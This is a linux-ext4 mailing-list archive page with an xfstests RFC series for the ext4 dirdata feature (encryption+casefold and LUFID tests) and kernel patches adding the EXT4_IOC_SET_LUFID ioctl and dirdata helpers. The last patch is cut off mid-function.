* [RFC PATCH v3 2/6] ext4/064 encryption + casefold feature combination WITHOUT dirdata
From: Artem Blagodarenko @ 2026-06-24 13:49 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko
In-Reply-To: <20260624134957.19209-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
This test verifies that files created in directories with both
encryption and case-insensitive (casefold) attributes work correctly.
See ext4/065 for the same test WITH dirdata feature enabled.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
---
tests/ext4/064 | 153 +++++++++++++++++++++++++++++++++++++++++++++
tests/ext4/064.out | 17 +++++
2 files changed, 170 insertions(+)
diff --git a/tests/ext4/064 b/tests/ext4/064
new file mode 100755
index 00000000..53450927
--- /dev/null
+++ b/tests/ext4/064
@@ -0,0 +1,153 @@
+#! /bin/bash
+# SPDX-License-Identifier: GPL-2.0
+#
+# Copyright (c) 2026 The Lustre Collective. All Rights Reserved.
+# Author: Artem Blagodarenko <ablagodarenko@thelustrecollective.com>
+#
+# FS QA Test ext4/064
+#
+# Test ext4 encryption + casefold feature combination WITHOUT dirdata.
+# This test verifies that files created in directories with both
+# encryption and case-insensitive (casefold) attributes work correctly.
+# See ext4/065 for the same test WITH dirdata feature enabled.
+#
+. ./common/preamble
+_begin_fstest auto quick encrypt casefold
+
+# get standard environment and checks
+. ./common/filter
+. ./common/encrypt
+. ./common/casefold
+. ./common/attr
+
+_exclude_fs ext2
+_exclude_fs ext3
+
+_require_scratch_nocheck
+_require_scratch_encryption
+_require_scratch_casefold
+_require_xfs_io_command "set_encpolicy"
+_require_xfs_io_command "add_enckey"
+
+# Helper to add a v2 encryption key and set policy on a directory
+_setup_encrypted_casefold_dir()
+{
+ local dir=$1
+ local raw_key=$(_generate_raw_encryption_key)
+ local keyspec=$(_add_enckey $SCRATCH_MNT "$raw_key" | awk '{print $NF}')
+ _set_encpolicy $dir $keyspec
+ _casefold_set_attr $dir
+ echo $keyspec
+}
+
+# Create a filesystem with both encrypt and casefold features
+_scratch_mkfs -O encrypt,casefold &>>$seqres.full
+_scratch_mount
+
+# Test 1: Create an encrypted + casefolded directory and verify lookups work
+echo "Test 1: Basic encrypted casefold lookup"
+mkdir $SCRATCH_MNT/test1
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test1 > /dev/null
+
+# Create file with lowercase, lookup with uppercase
+echo "hello" > $SCRATCH_MNT/test1/testfile.txt
+if [ -f "$SCRATCH_MNT/test1/TESTFILE.TXT" ]; then
+ echo "Case-insensitive lookup works in encrypted dir"
+else
+ echo "FAIL: Case-insensitive lookup failed in encrypted dir"
+fi
+
+# Verify the exact name on disk is preserved
+if _casefold_check_exact_name "$SCRATCH_MNT/test1" "testfile.txt"; then
+ echo "Original filename preserved"
+else
+ echo "FAIL: Original filename not preserved"
+fi
+
+# Test 2: Create files with different case variations
+echo "Test 2: Conflicting names in encrypted casefold dir"
+mkdir $SCRATCH_MNT/test2
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test2 > /dev/null
+
+echo "first" > $SCRATCH_MNT/test2/MyFile.txt
+# This should fail or overwrite since "MYFILE.TXT" is equivalent
+echo "second" > $SCRATCH_MNT/test2/MYFILE.TXT 2>/dev/null
+content=$(cat $SCRATCH_MNT/test2/myfile.txt)
+echo "Content after writes: $content"
+
+# Test 3: Unicode normalization in encrypted casefold dir
+echo "Test 3: Unicode in encrypted casefold dir"
+mkdir $SCRATCH_MNT/test3
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test3 > /dev/null
+
+# Test with UTF-8 characters
+fr_file1=$(echo -e "cafe\xcc\x81.txt")
+fr_file2=$(echo -e "caf\xc3\xa9.txt")
+echo "french" > "$SCRATCH_MNT/test3/$fr_file1"
+if [ -f "$SCRATCH_MNT/test3/$fr_file2" ]; then
+ echo "Unicode normalization works in encrypted dir"
+else
+ echo "FAIL: Unicode normalization failed in encrypted dir"
+fi
+
+# Test 4: Directory operations in encrypted casefold dir
+echo "Test 4: Directory operations in encrypted casefold dir"
+mkdir $SCRATCH_MNT/test4
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test4 > /dev/null
+
+mkdir $SCRATCH_MNT/test4/SubDir
+if [ -d "$SCRATCH_MNT/test4/SUBDIR" ]; then
+ echo "Directory case-insensitive lookup works"
+else
+ echo "FAIL: Directory case-insensitive lookup failed"
+fi
+
+# Test 5: Verify inheritance of casefold+encryption in subdirectories
+echo "Test 5: Inheritance of attributes"
+mkdir $SCRATCH_MNT/test5
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test5 > /dev/null
+
+mkdir $SCRATCH_MNT/test5/child
+echo "data" > $SCRATCH_MNT/test5/child/file.txt
+if [ -f "$SCRATCH_MNT/test5/CHILD/FILE.TXT" ]; then
+ echo "Attributes inherited correctly"
+else
+ echo "FAIL: Attributes not inherited"
+fi
+
+# Test 6: Remove and recreate with different case
+echo "Test 6: Remove and recreate with different case"
+mkdir $SCRATCH_MNT/test6
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test6 > /dev/null
+
+echo "original" > $SCRATCH_MNT/test6/RemoveMe.txt
+rm $SCRATCH_MNT/test6/REMOVEME.TXT
+echo "recreated" > $SCRATCH_MNT/test6/REMOVEME.TXT
+if _casefold_check_exact_name "$SCRATCH_MNT/test6" "REMOVEME.TXT"; then
+ echo "Recreated file has new case"
+else
+ echo "FAIL: Recreated file case incorrect"
+fi
+
+# Test 7: Hard links in encrypted casefold dir
+echo "Test 7: Hard links in encrypted casefold dir"
+mkdir $SCRATCH_MNT/test7
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test7 > /dev/null
+
+echo "linkdata" > $SCRATCH_MNT/test7/original.txt
+ln $SCRATCH_MNT/test7/original.txt $SCRATCH_MNT/test7/hardlink.txt
+if [ -f "$SCRATCH_MNT/test7/HARDLINK.TXT" ]; then
+ echo "Hard link case-insensitive lookup works"
+else
+ echo "FAIL: Hard link case-insensitive lookup failed"
+fi
+
+# Cleanup and verify filesystem
+_scratch_unmount
+_check_scratch_fs
+
+echo "Encrypted casefold tests completed"
+
+# success, all done
+status=0
+exit
diff --git a/tests/ext4/064.out b/tests/ext4/064.out
new file mode 100644
index 00000000..0197e51e
--- /dev/null
+++ b/tests/ext4/064.out
@@ -0,0 +1,17 @@
+QA output created by 064
+Test 1: Basic encrypted casefold lookup
+Case-insensitive lookup works in encrypted dir
+Original filename preserved
+Test 2: Conflicting names in encrypted casefold dir
+Content after writes: second
+Test 3: Unicode in encrypted casefold dir
+Unicode normalization works in encrypted dir
+Test 4: Directory operations in encrypted casefold dir
+Directory case-insensitive lookup works
+Test 5: Inheritance of attributes
+Attributes inherited correctly
+Test 6: Remove and recreate with different case
+Recreated file has new case
+Test 7: Hard links in encrypted casefold dir
+Hard link case-insensitive lookup works
+Encrypted casefold tests completed
--
2.43.7
^ permalink raw reply related
* [RFC PATCH v3 1/6] ext4: add common helper to check whether dirdata is applied
From: Artem Blagodarenko @ 2026-06-24 13:49 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko
In-Reply-To: <20260624134957.19209-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Add a helper that lists a directory with debugfs "ls -lD" and checks
whether any dirdata fields (fid= or hash=) exist.
This helper will be used by subsequent dirdata-related patches.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
---
common/ext4 | 34 ++++++++++++++++++++++++++++++++++
1 file changed, 34 insertions(+)
diff --git a/common/ext4 b/common/ext4
index a2ce456d..47c31db9 100644
--- a/common/ext4
+++ b/common/ext4
@@ -242,3 +242,37 @@ _ext4_get_inum_iflags() {
debugfs -R "stat <${inumber}>" "${dev}" 2> /dev/null | \
sed -n 's/^.*Flags: \([0-9a-fx]*\).*$/\1/p'
}
+
+# Helper to dump directory structure with hash info (requires dirdata feature)
+# This is useful for verifying that dirdata is storing hash information
+_dump_dir_structure()
+{
+ local dir=$1
+ local dir_name=$(basename $dir)
+ local expected=$3
+
+ local debugfs_output=$({
+ echo "cd $dir_name"
+ echo "ls -lD ."
+ echo "quit"
+ } | debugfs $SCRATCH_DEV 2>/dev/null)
+
+ # DEBUG: uncomment to see full debugfs output
+ # echo " [DEBUG] debugfs output for $dir_name:"
+ # echo "$debugfs_output" | grep -v "^debugfs:" | sed 's/^/ /'
+
+ # Check if hash data is present (encryption+casefold+dirdata case)
+ # or if fid data is present (dirdata+encryption or dirdata only case)
+ if echo "$debugfs_output" | grep -q "fid="; then
+ local fid_value=$(echo "$debugfs_output" | grep -o "fid=[^ ]*" | head -1 | sed 's/^fid=//')
+ if [ "$fid_value" = "$expected" ]; then
+ echo " Directory structure of $dir_name: OK (dirdata verified)"
+ else
+ echo " Directory structure of $dir_name: FAILED (fid mismatch: got '$fid_value', expected '$expected')"
+ fi
+ elif echo "$debugfs_output" | grep -q "hash="; then
+ echo " Directory structure of $dir_name: OK (dirdata verified)"
+ else
+ echo " Directory structure of $dir_name: FAILED (no dirdata)"
+ fi
+}
--
2.43.7
^ permalink raw reply related
* [RFC PATCH v3 0/6] ext4: tests for the dirdata feature (encryption+casefold, LUFID)
From: Artem Blagodarenko @ 2026-06-24 13:49 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko
These tests cover the ext4 "dirdata" feature (storing extra metadata
in directory entries beyond the file name), sent separately from the
kernel and e2fsprogs dirdata patch series for reference and review.
ext4/064 and ext4/065 verify that encryption and case-insensitive
(casefold) directories continue to work both without and with
dirdata enabled. ext4/066 and ext4/067 exercise the LUFID (Locally
Unique File ID) use of dirdata via a new EXT4_IOC_SET_LUFID ioctl,
using a small set_lufid helper utility added in this series.
Changes in v2:
- Ted Ts'o pointed out that the v1 tests exercised the
encryption+casefold/dirdata feature combination without actually
validating that the encrypted hash was stored as a dirdata
attribute (https://lore.kernel.org/all/20260418214359.GA58909@macsyma-wired.lan/).
ext4/064 and ext4/065 now use the new _dump_dir_structure helper
(debugfs-based) to dump and check the on-disk directory entry
content, confirming the hash is actually present as dirdata rather
than just exercising the feature combination.
- Zorro Lang asked about a confusingly-named helper
(_require_encrypted_casefold vs. _require_scratch_casefold); the
tests now consistently use _require_scratch_casefold.
- Added ext4/066 and ext4/067, plus a new common/ext4 helper and the
src/set_lufid.c utility, to directly verify LUFID data is correctly
stored in and retrieved from dirdata via EXT4_IOC_SET_LUFID, including
in combination with encryption+casefold.
Changes in v3:
- Fixed two off-by-one bugs in src/set_lufid.c, found while testing
the kernel-side EXT4_IOC_SET_LUFID fixes against this suite:
- The default (binary fid array) payload path computed
data_len = sizeof(fid) + 1, copying one byte of stack garbage past
the 16-byte LUFID struct.
- The explicit (argv[3]) payload path computed
data_len = strlen(lufid_data) + 1, treating a NUL terminator as
part of a binary payload that doesn't have one.
Both surfaced as a phantom extra FID in ext4/066 and ext4/067's
dirdata-dump verification once a kernel-side dirdata length
accounting bug was itself fixed -- that kernel bug had been
silently masking this test bug by truncating the same garbage byte
on write.
Artem Blagodarenko (6):
ext4: add common helper to check whether dirdata is applied
ext4/064 encryption + casefold feature combination WITHOUT dirdata
ext4/065 encryption + casefold + dirdata feature combination
ext4: add set_lufid utility
ext4/066: verify LUFID dirdata operations
ext4/067: LUFID and encryption+casefold+dirdata
common/config | 1 +
common/ext4 | 34 +++++++
src/Makefile | 2 +-
src/set_lufid.c | 196 ++++++++++++++++++++++++++++++++++++++++
tests/ext4/064 | 153 ++++++++++++++++++++++++++++++++
tests/ext4/064.out | 17 ++++
tests/ext4/065 | 217 +++++++++++++++++++++++++++++++++++++++++++++
tests/ext4/065.out | 26 ++++++
tests/ext4/066 | 158 +++++++++++++++++++++++++++++++++
tests/ext4/066.out | 4 +
tests/ext4/067 | 137 ++++++++++++++++++++++++++++
tests/ext4/067.out | 4 +
12 files changed, 948 insertions(+), 1 deletion(-)
create mode 100644 src/set_lufid.c
create mode 100755 tests/ext4/064
create mode 100644 tests/ext4/064.out
create mode 100755 tests/ext4/065
create mode 100644 tests/ext4/065.out
create mode 100755 tests/ext4/066
create mode 100644 tests/ext4/066.out
create mode 100755 tests/ext4/067
create mode 100644 tests/ext4/067.out
--
2.43.7
^ permalink raw reply
* [PATCH v4 11/11] ext4: Add EXT4_IOC_SET_LUFID ioctl for setting LUFID on directory entries
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Add a new ioctl command that allows setting LUFID (Locally Unique File ID)
data on existing directory entries. This includes:
- ext4_ioctl_set_lufid(): ioctl handler that validates parameters and
calls the underlying implementation
- ext4_dirdata_set_lufid(): Core function that performs the operation by:
* Looking up the target directory entry
* Retrieving the associated inode
* Deleting the old entry and re-creating it with LUFID data attached
This implementation requires the dirdata feature to be enabled on the
filesystem and properly handles transactions and inode locking to ensure
consistency.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/ext4.h | 15 ++++
fs/ext4/ioctl.c | 84 +++++++++++++++++++++
fs/ext4/namei.c | 155 ++++++++++++++++++++++++++++++++++++++
include/uapi/linux/ext4.h | 13 ++++
4 files changed, 267 insertions(+)
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 5674a64f830f..252a5a529205 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -1227,6 +1227,7 @@ struct ext4_inode_info {
#ifdef CONFIG_FS_ENCRYPTION
struct fscrypt_inode_info *i_crypt_info;
#endif
+ void *i_dirdata;
};
/*
@@ -2601,6 +2602,18 @@ struct ext4_dirent_hash {
struct ext4_dir_entry_hash dh_hash;
} __packed;
+static inline
+struct ext4_dirent_fid *ext4_dentry_get_fid(struct super_block *sb,
+ struct ext4_dentry_param *p)
+{
+ if (!ext4_has_feature_dirdata(sb))
+ return NULL;
+ if (p && p->edp_magic == EXT4_LUFID_MAGIC)
+ return &p->edp_dfid;
+
+ return NULL;
+}
+
#define EXT4_FT_DIR_CSUM 0xDE
/*
@@ -3302,6 +3315,8 @@ static inline int ext4_init_new_dir(handle_t *handle, struct inode *dir,
}
extern int ext4_dirblock_csum_verify(struct inode *inode,
struct buffer_head *bh);
+extern int ext4_dirdata_set_lufid(struct inode *dir, const char *filename,
+ int namelen, struct ext4_dentry_param *edp);
extern int ext4_htree_fill_tree(struct file *dir_file, __u32 start_hash,
__u32 start_minor_hash, __u32 *next_hash);
extern int ext4_search_dir(struct buffer_head *bh,
diff --git a/fs/ext4/ioctl.c b/fs/ext4/ioctl.c
index c8387e6a2c6e..725e46e1e46d 100644
--- a/fs/ext4/ioctl.c
+++ b/fs/ext4/ioctl.c
@@ -1535,6 +1535,87 @@ static int ext4_ioctl_set_tune_sb(struct file *filp,
return ret;
}
+/*
+ * ext4_ioctl_set_lufid() - Set LUFID on a directory entry
+ * @filp: file pointer (parent directory)
+ * @arg: pointer to ext4_set_lufid structure with filename and LUFID data
+ *
+ * This ioctl allows setting LUFID data on an existing
+ * directory entry. It is called on the parent directory with a filename and
+ * LUFID data.
+ */
+static long ext4_ioctl_set_lufid(struct file *filp, unsigned long arg)
+{
+ struct inode *dir = file_inode(filp);
+ struct mnt_idmap *idmap = file_mnt_idmap(filp);
+ struct ext4_set_lufid lufid_args;
+ struct {
+ __u32 edp_magic;
+ struct ext4_dirent_data_header df_header;
+ char df_fid[255];
+ } edp;
+ int err;
+
+ /* Check if parent is a directory */
+ if (!S_ISDIR(dir->i_mode))
+ return -ENOTDIR;
+
+ /* This ioctl mutates directory entries; merely having the directory
+ * open (which only ever requires read access) is not enough */
+ err = inode_permission(idmap, dir, MAY_WRITE);
+ if (err)
+ return err;
+
+ /* Copy arguments from user space */
+ if (copy_from_user(&lufid_args, (struct ext4_set_lufid __user *)arg,
+ sizeof(lufid_args)))
+ return -EFAULT;
+
+ /* Validate parameters */
+ if (lufid_args.esl_name_len == 0 || lufid_args.esl_name_len > EXT4_NAME_LEN)
+ return -EINVAL;
+
+ /* ddh_length (esl_data_len + the header byte below) must itself fit
+ * in the __u8 ddh_length field without wrapping */
+ if (lufid_args.esl_data_len == 0 ||
+ lufid_args.esl_data_len > 255 - sizeof(edp.df_header))
+ return -EINVAL;
+
+ /* Ensure filename is NUL-terminated and unmodified */
+ if (lufid_args.esl_name[lufid_args.esl_name_len - 1] != '\0')
+ return -EINVAL;
+
+ /* '.' and '..' are not ordinary entries -- they must stay the first
+ * two entries in the directory's first block, so they can't go
+ * through the general delete+re-add path this ioctl uses */
+ if (!strcmp(lufid_args.esl_name, ".") || !strcmp(lufid_args.esl_name, ".."))
+ return -EINVAL;
+
+ /* Prepare the dentry param struct with LUFID data. ddh_length is
+ * documented (see struct ext4_dirent_data_header) as the length of
+ * the header plus the whole data blob -- include the header here so
+ * every dirdata reader/writer that takes ddh_length at face value
+ * (e.g. ext4_dirdata_set()'s memcpy) copies the full LUFID payload
+ * instead of silently dropping its last byte. */
+ edp.edp_magic = EXT4_LUFID_MAGIC;
+ edp.df_header.ddh_length = lufid_args.esl_data_len +
+ sizeof(edp.df_header);
+ memcpy(edp.df_fid, lufid_args.esl_data, lufid_args.esl_data_len);
+
+ /* Want write access */
+ err = mnt_want_write_file(filp);
+ if (err)
+ return err;
+
+ /* Call the helper function to do the actual work */
+ err = ext4_dirdata_set_lufid(dir, lufid_args.esl_name,
+ lufid_args.esl_name_len - 1,
+ (struct ext4_dentry_param *)&edp);
+
+ mnt_drop_write_file(filp);
+ return err;
+}
+
static long __ext4_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
struct inode *inode = file_inode(filp);
@@ -1921,6 +2002,8 @@ static long __ext4_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
(void __user *)arg);
case EXT4_IOC_SET_TUNE_SB_PARAM:
return ext4_ioctl_set_tune_sb(filp, (void __user *)arg);
+ case EXT4_IOC_SET_LUFID:
+ return ext4_ioctl_set_lufid(filp, arg);
default:
return -ENOTTY;
}
@@ -2000,6 +2083,7 @@ long ext4_compat_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
case FS_IOC_SETFSLABEL:
case EXT4_IOC_GETFSUUID:
case EXT4_IOC_SETFSUUID:
+ case EXT4_IOC_SET_LUFID:
break;
default:
return -ENOIOCTLCMD;
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index 6fba1a7c0876..3aeea503f12d 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -2319,6 +2319,8 @@ static int add_dirent_to_buf(handle_t *handle, struct ext4_filename *fname,
if (ext4_has_feature_metadata_csum(inode->i_sb))
csum_size = sizeof(struct ext4_dir_entry_tail);
+ dfid = ext4_dentry_get_fid(inode->i_sb,
+ (struct ext4_dentry_param *)EXT4_I(inode)->i_dirdata);
if (!de) {
if (dfid)
dlen = dfid->df_header.ddh_length;
@@ -2665,6 +2667,7 @@ static int ext4_add_entry(handle_t *handle, struct dentry *dentry,
{
struct inode *dir = d_inode(dentry->d_parent);
+ EXT4_I(inode)->i_dirdata = dentry->d_fsdata;
if (fscrypt_is_nokey_name(dentry))
return -ENOKEY;
return __ext4_add_entry(handle, dir, &dentry->d_name, inode);
@@ -4426,6 +4429,158 @@ static int ext4_rename2(struct mnt_idmap *idmap,
return ext4_rename(idmap, old_dir, old_dentry, new_dir, new_dentry, flags);
}
+/*
+ * ext4_dirdata_set_lufid() - Set LUFID data on an existing directory entry
+ * @dir: parent directory inode
+ * @filename: name of the file in the directory
+ * @namelen: length of filename
+ * @edp: pointer to initialized dentry param with LUFID data
+ *
+ * This function finds an existing directory entry, deletes it, and re-creates it
+ * with LUFID data attached. Used by the EXT4_IOC_SET_LUFID ioctl.
+ *
+ * Returns 0 on success, negative error code on failure.
+ */
+int ext4_dirdata_set_lufid(struct inode *dir, const char *filename,
+ int namelen, struct ext4_dentry_param *edp)
+{
+ struct super_block *sb = dir->i_sb;
+ struct ext4_filename fname;
+ struct ext4_dir_entry_2 *de = NULL;
+ struct buffer_head *bh = NULL;
+ struct inode *inode = NULL;
+ handle_t *handle = NULL;
+ struct qstr d_name;
+ void *old_dirdata = NULL;
+ int err = 0;
+
+ /* Check if dirdata feature is enabled */
+ if (!ext4_has_feature_dirdata(sb))
+ return -ENOTSUPP;
+
+ if (namelen > EXT4_NAME_LEN)
+ return -ENAMETOOLONG;
+ if (namelen != strnlen(filename, namelen + 1))
+ return -EINVAL;
+
+ /* Setup the filename for lookup */
+ d_name.name = filename;
+ d_name.len = namelen;
+
+ /* Lookup the filename in the directory */
+ err = ext4_fname_setup_filename(dir, &d_name, 0, &fname);
+ if (err)
+ goto out_free;
+
+ bh = ext4_find_entry(dir, &d_name, &de, NULL);
+ if (!bh) {
+ err = -ENOENT;
+ goto out_free;
+ }
+
+ /* Get the inode number from the directory entry */
+ inode = ext4_iget(sb, le32_to_cpu(de->inode), EXT4_IGET_NORMAL);
+ if (IS_ERR(inode)) {
+ err = PTR_ERR(inode);
+ inode = NULL;
+ goto out_brelse;
+ }
+
+ /* Start a transaction */
+ handle = ext4_journal_start(dir, EXT4_HT_DIR,
+ 2 * EXT4_DATA_TRANS_BLOCKS(sb) +
+ EXT4_INDEX_EXTRA_TRANS_BLOCKS);
+ if (IS_ERR(handle)) {
+ err = PTR_ERR(handle);
+ handle = NULL;
+ goto out_iput;
+ }
+
+ inode_lock(dir);
+
+ /* EXT4_I(inode)->i_dirdata below is a *shared* per-inode field used
+ * to smuggle the LUFID payload into ext4_add_entry(); locking only
+ * dir does not stop a concurrent EXT4_IOC_SET_LUFID call targeting a
+ * different hardlink of the same inode (different dir, same inode)
+ * from clobbering it mid-call with its own stack-local pointer.
+ * Lock the target inode too, consistently dir-then-inode, to
+ * serialize the i_dirdata set/use/restore window below. */
+ if (inode != dir)
+ inode_lock_nested(inode, I_MUTEX_NONDIR2);
+
+ /* Delete the old entry */
+ err = ext4_delete_entry(handle, dir, de, bh);
+ if (err)
+ goto out_unlock;
+
+ brelse(bh);
+ bh = NULL;
+
+ /* Re-add the entry with LUFID data
+ * We set i_dirdata before adding so the entry can include it
+ */
+ old_dirdata = EXT4_I(inode)->i_dirdata;
+ EXT4_I(inode)->i_dirdata = edp;
+
+ /* Use ext4_add_entry() to properly handle hash table management
+ * and block splitting, just like rename does. This ensures the entry
+ * is placed in the correct hash block and avoids breaking dirhash.
+ */
+ {
+ struct dentry parent_dentry = { .d_inode = dir };
+ struct dentry new_dentry = {
+ .d_name = d_name,
+ .d_parent = &parent_dentry,
+ .d_inode = inode, /* Same inode (in-place update) */
+ .d_fsdata = edp, /* required */
+ };
+ err = ext4_add_entry(handle, &new_dentry, inode);
+ }
+ EXT4_I(inode)->i_dirdata = old_dirdata;
+
+ if (err) {
+ /*
+ * The original entry was already removed above and the
+ * re-add with the new LUFID failed; try to restore the
+ * original entry so the inode isn't left without any
+ * directory entry pointing at it.
+ */
+ struct dentry parent_dentry = { .d_inode = dir };
+ struct dentry orig_dentry = {
+ .d_name = d_name,
+ .d_parent = &parent_dentry,
+ .d_inode = inode,
+ };
+ int rollback_err = ext4_add_entry(handle, &orig_dentry, inode);
+
+ if (rollback_err)
+ EXT4_ERROR_INODE(dir,
+ "Failed to set LUFID on '%.*s' (err=%d) and failed to restore the original directory entry (err=%d); inode %llu may be orphaned",
+ namelen, filename, err, rollback_err,
+ inode->i_ino);
+ goto out_unlock;
+ }
+
+ /* Update inode times */
+ inode_set_ctime_current(dir);
+ inode_inc_iversion(dir);
+ ext4_mark_inode_dirty(handle, dir);
+
+out_unlock:
+ if (inode != dir)
+ inode_unlock(inode);
+ inode_unlock(dir);
+ ext4_journal_stop(handle);
+out_iput:
+ iput(inode);
+out_brelse:
+ brelse(bh);
+out_free:
+ ext4_fname_free_filename(&fname);
+
+ return err;
+}
+
/*
* directories can handle most operations...
*/
diff --git a/include/uapi/linux/ext4.h b/include/uapi/linux/ext4.h
index 9c683991c32f..9fab8978843b 100644
--- a/include/uapi/linux/ext4.h
+++ b/include/uapi/linux/ext4.h
@@ -35,6 +35,7 @@
#define EXT4_IOC_SETFSUUID _IOW('f', 44, struct fsuuid)
#define EXT4_IOC_GET_TUNE_SB_PARAM _IOR('f', 45, struct ext4_tune_sb_params)
#define EXT4_IOC_SET_TUNE_SB_PARAM _IOW('f', 46, struct ext4_tune_sb_params)
+#define EXT4_IOC_SET_LUFID _IOW('f', 47, struct ext4_set_lufid)
#define EXT4_IOC_SHUTDOWN _IOR('X', 125, __u32)
@@ -92,6 +93,18 @@ struct move_extent {
__u64 moved_len; /* moved block length */
};
+/*
+ * Structure for EXT4_IOC_SET_LUFID
+ * Sets LUFID on a directory entry
+ * Called on parent directory with filename and LUFID data as arguments
+ */
+struct ext4_set_lufid {
+ __u8 esl_name_len; /* length of filename */
+ char esl_name[255 + 1]; /* filename (NUL-terminated) */
+ __u8 esl_data_len; /* length of LUFID data */
+ char esl_data[255]; /* LUFID data (raw bytes) */
+};
+
/*
* Flags used by EXT4_IOC_SHUTDOWN
*/
--
2.43.7
^ permalink raw reply related
* [PATCH v4 10/11] ext4: add dirdata set/get helpers
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Add helpers to set and retrieve dirdata payload and hook them up at
the appropriate call sites.
Enable dirdata for casefold+encryption hashes and for storing a unique
128-bit file identifier in the directory entry for testing.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
foofile.txt | 0
fs/ext4/ext4.h | 4 +
fs/ext4/inline.c | 6 +-
fs/ext4/namei.c | 227 +++++++++++++++++++++++++++++++++++++++++------
4 files changed, 207 insertions(+), 30 deletions(-)
diff --git a/foofile.txt b/foofile.txt
new file mode 100644
index 000000000000..e69de29bb2d1
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 1e61ce13ed07..5674a64f830f 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -3874,6 +3874,10 @@ extern int __ext4_unlink(struct inode *dir, const struct qstr *d_name,
struct inode *inode, struct dentry *dentry);
extern int __ext4_link(struct inode *dir, struct inode *inode,
const struct qstr *d_name, struct dentry *dentry);
+extern unsigned char ext4_dirdata_get(struct ext4_dir_entry_2 *de,
+ struct inode *dir,
+ struct ext4_dirent_fid *lufid,
+ struct dx_hash_info *hinfo);
#define S_SHIFT 12
static const unsigned char ext4_type_by_mode[(S_IFMT >> S_SHIFT) + 1] = {
diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
index 1fff4defd45b..32b4ff83d4df 100644
--- a/fs/ext4/inline.c
+++ b/fs/ext4/inline.c
@@ -1350,10 +1350,8 @@ int ext4_inlinedir_to_tree(struct file *dir_file,
}
}
- if (ext4_hash_in_dirent(dir)) {
- hinfo->hash = EXT4_DIRENT_HASH(de);
- hinfo->minor_hash = EXT4_DIRENT_MINOR_HASH(de);
- } else {
+ if (!(ext4_dirdata_get(de, dir, NULL, hinfo) &
+ EXT4_DIRENT_CFHASH)) {
err = ext4fs_dirhash(dir, de->name, de->name_len, hinfo);
if (err) {
ret = err;
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index 91def9e0f84d..6fba1a7c0876 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -1108,22 +1108,22 @@ static int htree_dirblock_to_tree(struct file *dir_file,
/* silently ignore the rest of the block */
break;
}
- if (ext4_hash_in_dirent(dir)) {
- if (de->name_len && de->inode) {
- hinfo->hash = EXT4_DIRENT_HASH(de);
- hinfo->minor_hash = EXT4_DIRENT_MINOR_HASH(de);
- } else {
- hinfo->hash = 0;
- hinfo->minor_hash = 0;
- }
+ if (de->name_len && de->inode) {
+ /* check for saved hash first, or generate it from name */
+ if (!(ext4_dirdata_get(de, dir, NULL, hinfo) &
+ EXT4_DIRENT_CFHASH)) {
+ err = ext4fs_dirhash(dir, de->name,
+ de->name_len, hinfo);
+ if (err < 0) {
+ count = err;
+ goto errout;
+ }
+ }
} else {
- err = ext4fs_dirhash(dir, de->name,
- de->name_len, hinfo);
- if (err < 0) {
- count = err;
- goto errout;
- }
+ hinfo->hash = 0;
+ hinfo->minor_hash = 0;
}
+
if ((hinfo->hash < start_hash) ||
((hinfo->hash == start_hash) &&
(hinfo->minor_hash < start_minor_hash)))
@@ -1301,9 +1301,191 @@ static inline int search_dirblock(struct buffer_head *bh,
*/
/*
- * Create map of hash values, offsets, and sizes, stored at end of block.
- * Returns number of entries mapped.
+ * ext4_dirdata_get() - Read dirdata fields from a directory entry.
+ * @de: directory entry
+ * @dir: directory inode (used for fscrypt+casefold hash fallback)
+ * @dfid: if non-NULL and EXT4_DIRENT_LUFID is set, LUFID data is copied
+ * here
+ * @hinfo: if non-NULL, receives the casefold hash and minor hash
+ *
+ * Reads any dirdata stored in @de. If the dirdata feature is not enabled,
+ * falls back to reading the hash stored inline after the filename (for
+ * compatibility with the older casefold+fscrypt format).
+ *
+ * Returns a bitmask of EXT4_DIRENT_* flags indicating which fields were read.
+ */
+unsigned char ext4_dirdata_get(struct ext4_dir_entry_2 *de, struct inode *dir,
+ struct ext4_dirent_fid *dfid,
+ struct dx_hash_info *hinfo)
+{
+ unsigned char ret = 0;
